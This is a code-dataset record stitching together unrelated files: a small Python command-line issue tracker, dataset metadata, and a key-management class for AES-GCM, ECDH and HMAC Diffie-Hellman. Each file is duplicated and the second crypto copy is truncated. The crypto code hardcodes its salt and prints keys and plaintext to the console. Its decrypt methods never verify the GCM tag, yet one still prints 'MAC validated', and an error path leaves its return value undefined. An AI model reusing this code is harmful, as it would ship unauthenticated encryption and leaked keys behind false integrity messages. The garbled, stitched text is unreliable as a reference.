<filename>pyclitr.py<gh_stars>0 #! /usr/bin/env python3 # ^ ######## Import ######## import os, sys, uuid, json, pwd, copy from datetime import datetime ######## Functions ######## def json_dump (inp): return json.dumps(inp, sort_keys=True, indent=2) def create_json_file (filename): handle = open (filename + '.json', "w") handle.write("{}") handle.close() def read_json (filename): handle = open (filename + '.json', "r") content = json.loads(handle.read()) handle.close() return content def write_json_file (filename, content): handle = open (filename + '.json', "w") handle.write(json_dump(content)) handle.close() def print_help (): print ("Help for pyclitr\n") print("{:<20} {:<20} {:<35}".format("Command", "", "Description")) print("{:<20} {:<20} {:<35}".format("init", "", "Inititalize pyclitr for the current directory")) print("{:<20} {:<20} {:<35}".format("ls", "", "List all pending issues")) print("{:<20} {:<20} {:<35}".format("pending", "", "alias for ls")) print("{:<20} {:<20} {:<35}".format("completed", "", "List all completed issues")) print("{:<20} {:<20} {:<35}".format("add", "<>", "Adds a new issue with the given name. Additional values can be set, e.g. with project:test.")) print("{:<20} {:<20} {:<35}".format("delete", "<uuid>", "Delete issue with specified uuid")) print("{:<20} {:<20} {:<35}".format("modify", "<uuid>", "Modify issue with specified uuid")) print("{:<20} {:<20} {:<35}".format("complete", "<uuid>", "Mark issue with specified uuid as completed")) def note_edit (uuid, old, new): global pyclitr_dir edits = read_json(pyclitr_dir + 'edits') if not uuid in edits: edits[uuid] = [] edits[uuid].append({'editor' : pwd.getpwuid(os.getuid()).pw_name, 'time' : datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'from' : old, 'to' : new}) write_json_file(pyclitr_dir + "edits", edits) def dict_changes (first, second): for key, value in second.items(): if key not in first: print ("Added " + key + str(value)) elif value != first[key]: print ("Changed " + key + " from '" + str(first[key]) + "' to '" + str(value) + "'") if True == False: if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: status = 'completed' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") # Set basic variables cwd = os.getcwd() + '/' pyclitr_dir = cwd + '.pyclitr/' # Check if pyclitr has been initialized for this directory if os.path.isdir (pyclitr_dir): initialized = True else: initialized = False if initialized == False: if not len(sys.argv) > 1: print ("Hidden directory .pyclitr does not exist. To set up pyclitr, use 'pyclitr init'\n\n") print_help() elif not sys.argv[1] == 'init': print ("Hidden directory .pyclitr does not exist. To set up pyclitr, use 'pyclitr init'\n\n") print_help() elif len(sys.argv) == 1 or len(sys.argv) == 2 and sys.argv[1] == 'pending' or len(sys.argv) == 2 and sys.argv[1] == 'completed': if len(sys.argv) == 2 and sys.argv[1] == 'completed': issues = read_json(pyclitr_dir + "completed") else: issues = read_json(pyclitr_dir + "pending") order = ['entry', 'description', 'creator', 'project', 'uuid', 'assign', 'due'] print("\033[4m{:<10}\033[0m \033[4m{:<45}\033[0m \033[4m{:<10}\033[0m \033[4m{:<15}\033[0m \033[4m{:<36}\033[0m \033[4m{:<10}\033[0m \033[4m{:<10}\033[0m".format(order[0], order[1], order[2], order[3], order[4], order[5], order[6])) for iuuid, issue in issues.items(): print("{:<10} {:<45} {:<10} {:<15} {:<36} {:<10} {:<10}".format(issue[order[0]][0:10], issue[order[1]], issue[order[2]], issue[order[3]], iuuid, issue[order[5]], issue[order[6]])) if len(sys.argv) == 2: if sys.argv[1] == 'init': os.mkdir (pyclitr_dir) open(pyclitr_dir + 'config', 'a').close() create_json_file (pyclitr_dir + 'pending') create_json_file (pyclitr_dir + 'completed') create_json_file (pyclitr_dir + 'edits') print ("Initialized at .pyclitr") elif sys.argv[1] == 'help': print_help() if len(sys.argv) == 3 and sys.argv[1] == 'show': issues = read_json(pyclitr_dir + 'pending') if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: issues = read_json(pyclitr_dir + 'completed') if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") print("\033[4m{:<20}\033[0m \033[4m{:<35}\033[0m".format("Name", "Value")) print("{:<20} {:<35}".format("UUID", sys.argv[2])) for key, value in issue.items(): if key != 'annotation' and value != '': print("{:<20} {:<35}".format(key, value)) # Display edits if there are any edits = read_json (pyclitr_dir + "edits") if sys.argv[2] in edits: for i in edits[sys.argv[2]]: print ("\n\033[1m" + i['editor'] + "\033[0m edited this task on \033[4m" + i['time'] + "\033[0m:") dict_changes (i['from'], i['to']) if len(sys.argv) > 2 and sys.argv[1] == 'add': pending = read_json(pyclitr_dir + 'pending') iuuid = str(uuid.uuid1()) issue = {"entry" : datetime.now().strftime('%Y-%m-%d %H:%M:%S'), "creator" : pwd.getpwuid(os.getuid()).pw_name, 'annotation' : [], 'project' : '', 'status' : 'pending', 'assign' : '', 'due' : ''} args = sys.argv[2:] title = '' for i in args: attr = i.split(":") if (len(attr) == 2): issue[str(attr[0])] = str(attr[1]) else: title = title + i + " " issue['description'] = str(title).strip(" ") pending[iuuid] = issue write_json_file (pyclitr_dir + "pending", pending) print ("Issue \033[1m" + title + "\033[0m added") if len(sys.argv) > 2 and sys.argv[1] == 'modify': # Check whether this issue is pending or completed status = 'pending' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: status = 'completed' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") original = copy.copy(issue) args = sys.argv[3:] title = '' for i in args: attr = i.split(":") if (len(attr) == 2): issue[str(attr[0])] = str(attr[1]) else: title = title + i + " " if title != '': issue['description'] = str(title).strip(" ") issues[sys.argv[2]] = issue write_json_file (pyclitr_dir + status, issues) print ("Issue \033[1m" + sys.argv[2] + " (" + issue['description'] + ")" + "\033[0m modified") note_edit(sys.argv[2], original, issue) if len(sys.argv) > 2 and sys.argv[1] == 'complete': # Check whether this issue is pending or completed status = 'pending' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: status = 'completed' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") original = copy.copy(issue) issue['status'] = 'completed' completed = read_json(pyclitr_dir + "completed") completed[sys.argv[2]] = issue write_json_file (pyclitr_dir + "completed", completed) del issues[sys.argv[2]] write_json_file (pyclitr_dir + status, issues) print ("Issue \033[1m" + sys.argv[2] + " (" + issue['description'] + ")" + "\033[0m moved to completed") note_edit(sys.argv[2], original, issue) if len(sys.argv) == 3 and sys.argv[1] == 'delete': # Check whether this issue is pending or completed status = 'pending' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: status = 'completed' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") del issues[sys.argv[2]] write_json_file (pyclitr_dir + status, issues)
<filename>pyclitr.py<gh_stars>0 #! /usr/bin/env python3 # ^ ######## Import ######## import os, sys, uuid, json, pwd, copy from datetime import datetime ######## Functions ######## def json_dump (inp): return json.dumps(inp, sort_keys=True, indent=2) def create_json_file (filename): handle = open (filename + '.json', "w") handle.write("{}") handle.close() def read_json (filename): handle = open (filename + '.json', "r") content = json.loads(handle.read()) handle.close() return content def write_json_file (filename, content): handle = open (filename + '.json', "w") handle.write(json_dump(content)) handle.close() def print_help (): print ("Help for pyclitr\n") print("{:<20} {:<20} {:<35}".format("Command", "", "Description")) print("{:<20} {:<20} {:<35}".format("init", "", "Inititalize pyclitr for the current directory")) print("{:<20} {:<20} {:<35}".format("ls", "", "List all pending issues")) print("{:<20} {:<20} {:<35}".format("pending", "", "alias for ls")) print("{:<20} {:<20} {:<35}".format("completed", "", "List all completed issues")) print("{:<20} {:<20} {:<35}".format("add", "<>", "Adds a new issue with the given name. Additional values can be set, e.g. with project:test.")) print("{:<20} {:<20} {:<35}".format("delete", "<uuid>", "Delete issue with specified uuid")) print("{:<20} {:<20} {:<35}".format("modify", "<uuid>", "Modify issue with specified uuid")) print("{:<20} {:<20} {:<35}".format("complete", "<uuid>", "Mark issue with specified uuid as completed")) def note_edit (uuid, old, new): global pyclitr_dir edits = read_json(pyclitr_dir + 'edits') if not uuid in edits: edits[uuid] = [] edits[uuid].append({'editor' : pwd.getpwuid(os.getuid()).pw_name, 'time' : datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'from' : old, 'to' : new}) write_json_file(pyclitr_dir + "edits", edits) def dict_changes (first, second): for key, value in second.items(): if key not in first: print ("Added " + key + str(value)) elif value != first[key]: print ("Changed " + key + " from '" + str(first[key]) + "' to '" + str(value) + "'") if True == False: if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: status = 'completed' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") # Set basic variables cwd = os.getcwd() + '/' pyclitr_dir = cwd + '.pyclitr/' # Check if pyclitr has been initialized for this directory if os.path.isdir (pyclitr_dir): initialized = True else: initialized = False if initialized == False: if not len(sys.argv) > 1: print ("Hidden directory .pyclitr does not exist. To set up pyclitr, use 'pyclitr init'\n\n") print_help() elif not sys.argv[1] == 'init': print ("Hidden directory .pyclitr does not exist. To set up pyclitr, use 'pyclitr init'\n\n") print_help() elif len(sys.argv) == 1 or len(sys.argv) == 2 and sys.argv[1] == 'pending' or len(sys.argv) == 2 and sys.argv[1] == 'completed': if len(sys.argv) == 2 and sys.argv[1] == 'completed': issues = read_json(pyclitr_dir + "completed") else: issues = read_json(pyclitr_dir + "pending") order = ['entry', 'description', 'creator', 'project', 'uuid', 'assign', 'due'] print("\033[4m{:<10}\033[0m \033[4m{:<45}\033[0m \033[4m{:<10}\033[0m \033[4m{:<15}\033[0m \033[4m{:<36}\033[0m \033[4m{:<10}\033[0m \033[4m{:<10}\033[0m".format(order[0], order[1], order[2], order[3], order[4], order[5], order[6])) for iuuid, issue in issues.items(): print("{:<10} {:<45} {:<10} {:<15} {:<36} {:<10} {:<10}".format(issue[order[0]][0:10], issue[order[1]], issue[order[2]], issue[order[3]], iuuid, issue[order[5]], issue[order[6]])) if len(sys.argv) == 2: if sys.argv[1] == 'init': os.mkdir (pyclitr_dir) open(pyclitr_dir + 'config', 'a').close() create_json_file (pyclitr_dir + 'pending') create_json_file (pyclitr_dir + 'completed') create_json_file (pyclitr_dir + 'edits') print ("Initialized at .pyclitr") elif sys.argv[1] == 'help': print_help() if len(sys.argv) == 3 and sys.argv[1] == 'show': issues = read_json(pyclitr_dir + 'pending') if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: issues = read_json(pyclitr_dir + 'completed') if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") print("\033[4m{:<20}\033[0m \033[4m{:<35}\033[0m".format("Name", "Value")) print("{:<20} {:<35}".format("UUID", sys.argv[2])) for key, value in issue.items(): if key != 'annotation' and value != '': print("{:<20} {:<35}".format(key, value)) # Display edits if there are any edits = read_json (pyclitr_dir + "edits") if sys.argv[2] in edits: for i in edits[sys.argv[2]]: print ("\n\033[1m" + i['editor'] + "\033[0m edited this task on \033[4m" + i['time'] + "\033[0m:") dict_changes (i['from'], i['to']) if len(sys.argv) > 2 and sys.argv[1] == 'add': pending = read_json(pyclitr_dir + 'pending') iuuid = str(uuid.uuid1()) issue = {"entry" : datetime.now().strftime('%Y-%m-%d %H:%M:%S'), "creator" : pwd.getpwuid(os.getuid()).pw_name, 'annotation' : [], 'project' : '', 'status' : 'pending', 'assign' : '', 'due' : ''} args = sys.argv[2:] title = '' for i in args: attr = i.split(":") if (len(attr) == 2): issue[str(attr[0])] = str(attr[1]) else: title = title + i + " " issue['description'] = str(title).strip(" ") pending[iuuid] = issue write_json_file (pyclitr_dir + "pending", pending) print ("Issue \033[1m" + title + "\033[0m added") if len(sys.argv) > 2 and sys.argv[1] == 'modify': # Check whether this issue is pending or completed status = 'pending' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: status = 'completed' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") original = copy.copy(issue) args = sys.argv[3:] title = '' for i in args: attr = i.split(":") if (len(attr) == 2): issue[str(attr[0])] = str(attr[1]) else: title = title + i + " " if title != '': issue['description'] = str(title).strip(" ") issues[sys.argv[2]] = issue write_json_file (pyclitr_dir + status, issues) print ("Issue \033[1m" + sys.argv[2] + " (" + issue['description'] + ")" + "\033[0m modified") note_edit(sys.argv[2], original, issue) if len(sys.argv) > 2 and sys.argv[1] == 'complete': # Check whether this issue is pending or completed status = 'pending' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: status = 'completed' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") original = copy.copy(issue) issue['status'] = 'completed' completed = read_json(pyclitr_dir + "completed") completed[sys.argv[2]] = issue write_json_file (pyclitr_dir + "completed", completed) del issues[sys.argv[2]] write_json_file (pyclitr_dir + status, issues) print ("Issue \033[1m" + sys.argv[2] + " (" + issue['description'] + ")" + "\033[0m moved to completed") note_edit(sys.argv[2], original, issue) if len(sys.argv) == 3 and sys.argv[1] == 'delete': # Check whether this issue is pending or completed status = 'pending' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: status = 'completed' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") del issues[sys.argv[2]] write_json_file (pyclitr_dir + status, issues)
en
0.745842
#! /usr/bin/env python3 # ^ ######## Import ######## ######## Functions ######## # Set basic variables # Check if pyclitr has been initialized for this directory # Display edits if there are any # Check whether this issue is pending or completed # Check whether this issue is pending or completed # Check whether this issue is pending or completed
2.548967
3
src/contexts/kms/computed_data/infrastructure/persistence/AllAlgorithmComputedDataRepository.py
parada3desu/foxy-key-broker
0
6623566
<filename>src/contexts/kms/computed_data/infrastructure/persistence/AllAlgorithmComputedDataRepository.py<gh_stars>0 import sys from Crypto.Cipher import AES from Crypto.Protocol.KDF import PBKDF2 from cryptography.hazmat.primitives import hashes, hmac from cryptography.hazmat.primitives._serialization import PublicFormat, Encoding from cryptography.hazmat.primitives.asymmetric import dh from cryptography.hazmat.primitives.asymmetric import ec from cryptography.hazmat.primitives.serialization import load_pem_public_key, load_pem_parameters from src.contexts.kms.computed_data.domain.entities.ComputedData import ComputedData from src.contexts.kms.computed_data.domain.entities.ComputedDataInput import ComputedDataInput from src.contexts.kms.computed_data.domain.entities.ComputedDataMeta import ComputedDataMeta from src.contexts.kms.computed_data.domain.entities.ComputedDataOutput import ComputedDataOutput from src.contexts.kms.computed_data.domain.entities.ComputedDataType import ComputedDataType, ComputedDataTypes from src.contexts.kms.computed_data.domain.repositories.ComputedDataRepository import ComputedDataRepository from src.contexts.kms.cryptokeys.domain.entities.CryptoKey import CryptoKey from src.contexts.kms.cryptokeys.domain.entities.CryptoKeyType import CryptoKeyTypes from src.contexts.shared.domain.BaseObject import BaseObject class AllAlgorithmComputedDataRepository(BaseObject, ComputedDataRepository): async def find_one_by_crypto_key_and_input(self, key: CryptoKey, input: ComputedDataInput, cd_type: ComputedDataType) -> ComputedData: output = input.value() meta = {} if key.type.value() == CryptoKeyTypes.DIFFIE_HELLMAN_ELLIPTIC_CURVE.value: output, meta = await self.ecdh_get_shared_key_platform(key.payload.value()) if key.type.value() == CryptoKeyTypes.DIFFIE_HELLMAN_HMAC.value: parameters = key.parameters.value() dh_parameters = parameters['parameters'] signature = parameters['signature'] output, meta = await self.hmac_DH_GetSharedKey_Platform(dh_parameters, key.payload.value(), signature) if key.type.value() == CryptoKeyTypes.AE.value and cd_type.value() == ComputedDataTypes.ENCRYPT.value: output, meta = await self.encryption_AE(key.payload.value(), input.value()) if key.type.value() == CryptoKeyTypes.AE.value and cd_type.value() == ComputedDataTypes.DECRYPT.value: text, nonce = tuple(input.value().split('@')) output, meta = await self.decrypt_AE(key.payload.value(), text, nonce) if key.type.value() == CryptoKeyTypes.AEAD.value and cd_type.value() == ComputedDataTypes.ENCRYPT.value: output, meta = await self.Encryption_AEAD(key.payload.value(), input.value()) if key.type.value() == CryptoKeyTypes.AEAD.value and cd_type.value() == ComputedDataTypes.DECRYPT.value: text, nonce = tuple(input.value().split('@')) output, meta = await self.Decrypt_AEAD(text, key.payload.value(), nonce) data = ComputedData( input, ComputedDataOutput(output), key.id, cd_type, ComputedDataMeta(meta), ) return data async def Encryption_AEAD(self, passphrase: str, sensitive_data: str): # Key generation key_gen = b"/\<KEY>" # Key derivation key = PBKDF2(passphrase, key_gen) # Contraseña basada en key derivation print("AES Encryption Key: " + str(key)) # Data sensitiva para cifrar print("Data enviada para cifrar: " + "\n" + str(sensitive_data)) # Encriptación usando AES GCM cipher = AES.new(key, AES.MODE_GCM) # https://pycryptodome.readthedocs.io/en/latest/src/cipher/aes.html ciphertext = cipher.encrypt(sensitive_data.encode('utf-8')) nonce = cipher.nonce # Mensaje transmitido # ciphertext: resultado de los datos cifrados, # tag: Codigo de autenticacion de mensajes MAC # nonce: vector de inicializacion (solo ocurre una vez) transmitted_message = ciphertext.hex() print("\nMensaje transmitido: " + str(transmitted_message)) return f'{transmitted_message}@{nonce.hex()}', {'nonce': nonce.hex()} async def Decrypt_AEAD(self, transmitted_message: str, passphrase: str, nonce: str) -> str: received_kdf_salt = b"/\x84F\xc5\xddA^k\xd2.C\x19'\x1a2\x9c" received_msg = transmitted_message print("Mensaje recibido: " + str(received_msg)) received_ciphertext = received_msg # Generate decryption key from passphrase and salt decryption_key = PBKDF2(passphrase, received_kdf_salt) print("Decryption Key: " + str(decryption_key)) cipher = AES.new(decryption_key, AES.MODE_GCM, bytes.fromhex(nonce)) try: decrypted_data = cipher.decrypt(bytes.fromhex(received_ciphertext)) print("\nMAC validated: Data was encrypted by someone with the shared secret passphrase") print("All allies have passphrase - SYMMETRIC encryption!!!") print("Data descifrada: " + str(decrypted_data)) except Exception as e: print("\nFallo de la validación MAC durante la desencriptación. Auntenticación no garantizada") return (decrypted_data).decode(), {} async def encryption_AE(self, passphrase: str, sensitive_data: str): # Key generation key_gen = b"/\<KEY>" # Key derivation key = PBKDF2(passphrase, key_gen) # Contraseña basada en key derivation print("AES Encryption Key: " + str(key)) # Data sensitiva para cifrar print("Data enviada para cifrar: " + "\n" + str(sensitive_data)) # Encriptación usando AES GCM cipher = AES.new(key, AES.MODE_GCM) # https://pycryptodome.readthedocs.io/en/latest/src/cipher/aes.html ciphertext, tag = cipher.encrypt_and_digest(sensitive_data.encode('utf-8')) nonce = cipher.nonce # Mensaje transmitido # ciphertext: resultado de los datos cifrados, # tag: Codigo de autenticacion de mensajes MAC # nonce: vector de inicializacion (solo ocurre una vez) transmitted_message = ciphertext.hex() meta = { 'tag': tag.hex(), 'nonce': nonce.hex(), } print("\nMensaje transmitido: " + str(transmitted_message)) print(type(transmitted_message)) return f'{transmitted_message}@{nonce.hex()}', meta async def decrypt_AE(self, passphrase: str, transmitted_message: str, nonce: str): received_msg = transmitted_message print("\nMensaje recibido: " + str(received_msg)) received_kdf_salt = b"/\x84F\xc5\xddA^k\xd2.C\x19'\x1a2\x9c" # Key derivation received_ciphertext, received_nonce = bytes.fromhex(transmitted_message), bytes.fromhex(nonce) # Generar decryption key con la contraseña y salt decryption_key = PBKDF2(passphrase, received_kdf_salt) print("Decryption Key: " + str(decryption_key)) # Validar MAC y descifrar, si la validación MAC falla, ValueError exception se va a mostrar cipher = AES.new(decryption_key, AES.MODE_GCM, received_nonce) try: decrypted_data = cipher.decrypt(received_ciphertext) print("Data descifrada: " + str(decrypted_data)) except ValueError as mac_mismatch: print("\nFallo de la validación MAC durante la desencriptación. Auntenticación no garantizada") return decrypted_data.decode('utf-8'), {} async def ecdh_get_shared_key_platform(self, public_key_IoT: str) -> (str, dict): # Input para shared key Platform: ID clave pública IoT # Returns shared key IoT # Plataforma genera su clave pública y privada (y la pública se almacena en la bbdd para el IoT) private_key = ec.generate_private_key(ec.SECP384R1()) public_key = private_key.public_key() str_public_key = public_key.public_bytes(Encoding.PEM, PublicFormat.SubjectPublicKeyInfo).decode('utf-8') # 1. Obtener clave pública en string de la bd y pasar a objeto key public_key_IoT_pem = public_key_IoT.encode('utf-8') loaded_public_key_IoT = load_pem_public_key(public_key_IoT_pem) # Returns shared key platform shared_key = private_key.exchange(ec.ECDH(), loaded_public_key_IoT) return shared_key.hex(), {'generated-public-key': str_public_key} async def hmac_DH_GetSharedKey_Platform(self, dh_parameters: str, public_key_IoT: str, pk_signature: str) -> ( str, dict): # A la API le llega el id de la clave y de ahí saca el string de parámetros y de la public key del IoT # En este punto, el KMS ya tiene los dh_parameters y la clave pública en string y debe convertirlo al objeto original # 1. Conversión a bytes y deserialización de parámetros dh_parameters_pem = dh_parameters.encode("utf-8") loaded_dh_params = load_pem_parameters(dh_parameters_pem) # 2. Conversión a bytes y deserialización de clave pública IoT public_key_IoT_pem = public_key_IoT.encode('utf-8') loaded_public_key_IoT = load_pem_public_key(public_key_IoT_pem) # Comprueba que la clave pública del IoT es correcta if (not isinstance(loaded_dh_params, dh.DHParameters) or not isinstance(loaded_public_key_IoT, dh.DHPublicKey)): sys.exit('Protocol error: Platform received a wrong message!') # Comprueba la autenticidad con la HMAC recibida h_IoT = hmac.HMAC(public_key_IoT_pem, hashes.SHA256()) h_IoT.update(b"Platform public key hash") h_IoT.verify(bytes.fromhex(pk_signature)) # 3. Plataforma genera sus propias claves privadas y públicas platform_private_key = loaded_dh_params.generate_private_key() platform_public_key = platform_private_key.public_key() # El KMS debe guardar esta clave pública junto con los parámetros y str_signature en la bbdd con id platform-HMACDH platform_pk_pem = platform_public_key.public_bytes(Encoding.PEM, PublicFormat.SubjectPublicKeyInfo) str_platform_pk = platform_pk_pem.decode('utf-8') # HMAC h = hmac.HMAC(platform_pk_pem, hashes.SHA256()) h.update(b"Platform public key hash") signature = h.finalize() str_signature = signature.hex() shared_key = platform_private_key.exchange(loaded_public_key_IoT) # Devuelve la clave en string, el IoT debe enviar al KMS luego de nuevo esta clave para que la almacene return shared_key.hex(), {'generated-public-key': str_platform_pk, 'signature': str_signature, 'parameters': dh_parameters}
<filename>src/contexts/kms/computed_data/infrastructure/persistence/AllAlgorithmComputedDataRepository.py<gh_stars>0 import sys from Crypto.Cipher import AES from Crypto.Protocol.KDF import PBKDF2 from cryptography.hazmat.primitives import hashes, hmac from cryptography.hazmat.primitives._serialization import PublicFormat, Encoding from cryptography.hazmat.primitives.asymmetric import dh from cryptography.hazmat.primitives.asymmetric import ec from cryptography.hazmat.primitives.serialization import load_pem_public_key, load_pem_parameters from src.contexts.kms.computed_data.domain.entities.ComputedData import ComputedData from src.contexts.kms.computed_data.domain.entities.ComputedDataInput import ComputedDataInput from src.contexts.kms.computed_data.domain.entities.ComputedDataMeta import ComputedDataMeta from src.contexts.kms.computed_data.domain.entities.ComputedDataOutput import ComputedDataOutput from src.contexts.kms.computed_data.domain.entities.ComputedDataType import ComputedDataType, ComputedDataTypes from src.contexts.kms.computed_data.domain.repositories.ComputedDataRepository import ComputedDataRepository from src.contexts.kms.cryptokeys.domain.entities.CryptoKey import CryptoKey from src.contexts.kms.cryptokeys.domain.entities.CryptoKeyType import CryptoKeyTypes from src.contexts.shared.domain.BaseObject import BaseObject class AllAlgorithmComputedDataRepository(BaseObject, ComputedDataRepository): async def find_one_by_crypto_key_and_input(self, key: CryptoKey, input: ComputedDataInput, cd_type: ComputedDataType) -> ComputedData: output = input.value() meta = {} if key.type.value() == CryptoKeyTypes.DIFFIE_HELLMAN_ELLIPTIC_CURVE.value: output, meta = await self.ecdh_get_shared_key_platform(key.payload.value()) if key.type.value() == CryptoKeyTypes.DIFFIE_HELLMAN_HMAC.value: parameters = key.parameters.value() dh_parameters = parameters['parameters'] signature = parameters['signature'] output, meta = await self.hmac_DH_GetSharedKey_Platform(dh_parameters, key.payload.value(), signature) if key.type.value() == CryptoKeyTypes.AE.value and cd_type.value() == ComputedDataTypes.ENCRYPT.value: output, meta = await self.encryption_AE(key.payload.value(), input.value()) if key.type.value() == CryptoKeyTypes.AE.value and cd_type.value() == ComputedDataTypes.DECRYPT.value: text, nonce = tuple(input.value().split('@')) output, meta = await self.decrypt_AE(key.payload.value(), text, nonce) if key.type.value() == CryptoKeyTypes.AEAD.value and cd_type.value() == ComputedDataTypes.ENCRYPT.value: output, meta = await self.Encryption_AEAD(key.payload.value(), input.value()) if key.type.value() == CryptoKeyTypes.AEAD.value and cd_type.value() == ComputedDataTypes.DECRYPT.value: text, nonce = tuple(input.value().split('@')) output, meta = await self.Decrypt_AEAD(text, key.payload.value(), nonce) data = ComputedData( input, ComputedDataOutput(output), key.id, cd_type, ComputedDataMeta(meta), ) return data async def Encryption_AEAD(self, passphrase: str, sensitive_data: str): # Key generation key_gen = b"/\<KEY>" # Key derivation key = PBKDF2(passphrase, key_gen) # Contraseña basada en key derivation print("AES Encryption Key: " + str(key)) # Data sensitiva para cifrar print("Data enviada para cifrar: " + "\n" + str(sensitive_data)) # Encriptación usando AES GCM cipher = AES.new(key, AES.MODE_GCM) # https://pycryptodome.readthedocs.io/en/latest/src/cipher/aes.html ciphertext = cipher.encrypt(sensitive_data.encode('utf-8')) nonce = cipher.nonce # Mensaje transmitido # ciphertext: resultado de los datos cifrados, # tag: Codigo de autenticacion de mensajes MAC # nonce: vector de inicializacion (solo ocurre una vez) transmitted_message = ciphertext.hex() print("\nMensaje transmitido: " + str(transmitted_message)) return f'{transmitted_message}@{nonce.hex()}', {'nonce': nonce.hex()} async def Decrypt_AEAD(self, transmitted_message: str, passphrase: str, nonce: str) -> str: received_kdf_salt = b"/\x84F\xc5\xddA^k\xd2.C\x19'\x1a2\x9c" received_msg = transmitted_message print("Mensaje recibido: " + str(received_msg)) received_ciphertext = received_msg # Generate decryption key from passphrase and salt decryption_key = PBKDF2(passphrase, received_kdf_salt) print("Decryption Key: " + str(decryption_key)) cipher = AES.new(decryption_key, AES.MODE_GCM, bytes.fromhex(nonce)) try: decrypted_data = cipher.decrypt(bytes.fromhex(received_ciphertext)) print("\nMAC validated: Data was encrypted by someone with the shared secret passphrase") print("All allies have passphrase - SYMMETRIC encryption!!!") print("Data descifrada: " + str(decrypted_data)) except Exception as e: print("\nFallo de la validación MAC durante la desencriptación. Auntenticación no garantizada") return (decrypted_data).decode(), {} async def encryption_AE(self, passphrase: str, sensitive_data: str): # Key generation key_gen = b"/\<KEY>" # Key derivation key = PBKDF2(passphrase, key_gen) # Contraseña basada en key derivation print("AES Encryption Key: " + str(key)) # Data sensitiva para cifrar print("Data enviada para cifrar: " + "\n" + str(sensitive_data)) # Encriptación usando AES GCM cipher = AES.new(key, AES.MODE_GCM) # https://pycryptodome.readthedocs.io/en/latest/src/cipher/aes.html ciphertext, tag = cipher.encrypt_and_digest(sensitive_data.encode('utf-8')) nonce = cipher.nonce # Mensaje transmitido # ciphertext: resultado de los datos cifrados, # tag: Codigo de autenticacion de mensajes MAC # nonce: vector de inicializacion (solo ocurre una vez) transmitted_message = ciphertext.hex() meta = { 'tag': tag.hex(), 'nonce': nonce.hex(), } print("\nMensaje transmitido: " + str(transmitted_message)) print(type(transmitted_message)) return f'{transmitted_message}@{nonce.hex()}', meta async def decrypt_AE(self, passphrase: str, transmitted_message: str, nonce: str): received_msg = transmitted_message print("\nMensaje recibido: " + str(received_msg)) received_kdf_salt = b"/\x84F\xc5\xddA^k\xd2.C\x19'\x1a2\x9c" # Key derivation received_ciphertext, received_nonce = bytes.fromhex(transmitted_message), bytes.fromhex(nonce) # Generar decryption key con la contraseña y salt decryption_key = PBKDF2(passphrase, received_kdf_salt) print("Decryption Key: " + str(decryption_key)) # Validar MAC y descifrar, si la validación MAC falla, ValueError exception se va a mostrar cipher = AES.new(decryption_key, AES.MODE_GCM, received_nonce) try: decrypted_data = cipher.decrypt(received_ciphertext) print("Data descifrada: " + str(decrypted_data)) except ValueError as mac_mismatch: print("\nFallo de la validación MAC durante la desencriptación. Auntenticación no garantizada") return decrypted_data.decode('utf-8'), {} async def ecdh_get_shared_key_platform(self, public_key_IoT: str) -> (str, dict): # Input para shared key Platform: ID clave pública IoT # Returns shared key IoT # Plataforma genera su clave pública y privada (y la pública se almacena en la bbdd para el IoT) private_key = ec.generate_private_key(ec.SECP384R1()) public_key = private_key.public_key() str_public_key = public_key.public_bytes(Encoding.PEM, PublicFormat.SubjectPublicKeyInfo).decode('utf-8') # 1. Obtener clave pública en string de la bd y pasar a objeto key public_key_IoT_pem = public_key_IoT.encode('utf-8') loaded_public_key_IoT = load_pem_public_key(public_key_IoT_pem) # Returns shared key platform shared_key = private_key.exchange(ec.ECDH(), loaded_public_key_IoT) return shared_key.hex(), {'generated-public-key': str_public_key} async def hmac_DH_GetSharedKey_Platform(self, dh_parameters: str, public_key_IoT: str, pk_signature: str) -> ( str, dict): # A la API le llega el id de la clave y de ahí saca el string de parámetros y de la public key del IoT # En este punto, el KMS ya tiene los dh_parameters y la clave pública en string y debe convertirlo al objeto original # 1. Conversión a bytes y deserialización de parámetros dh_parameters_pem = dh_parameters.encode("utf-8") loaded_dh_params = load_pem_parameters(dh_parameters_pem) # 2. Conversión a bytes y deserialización de clave pública IoT public_key_IoT_pem = public_key_IoT.encode('utf-8') loaded_public_key_IoT = load_pem_public_key(public_key_IoT_pem) # Comprueba que la clave pública del IoT es correcta if (not isinstance(loaded_dh_params, dh.DHParameters) or not isinstance(loaded_public_key_IoT, dh.DHPublicKey)): sys.exit('Protocol error: Platform received a wrong message!') # Comprueba la autenticidad con la HMAC recibida h_IoT = hmac.HMAC(public_key_IoT_pem, 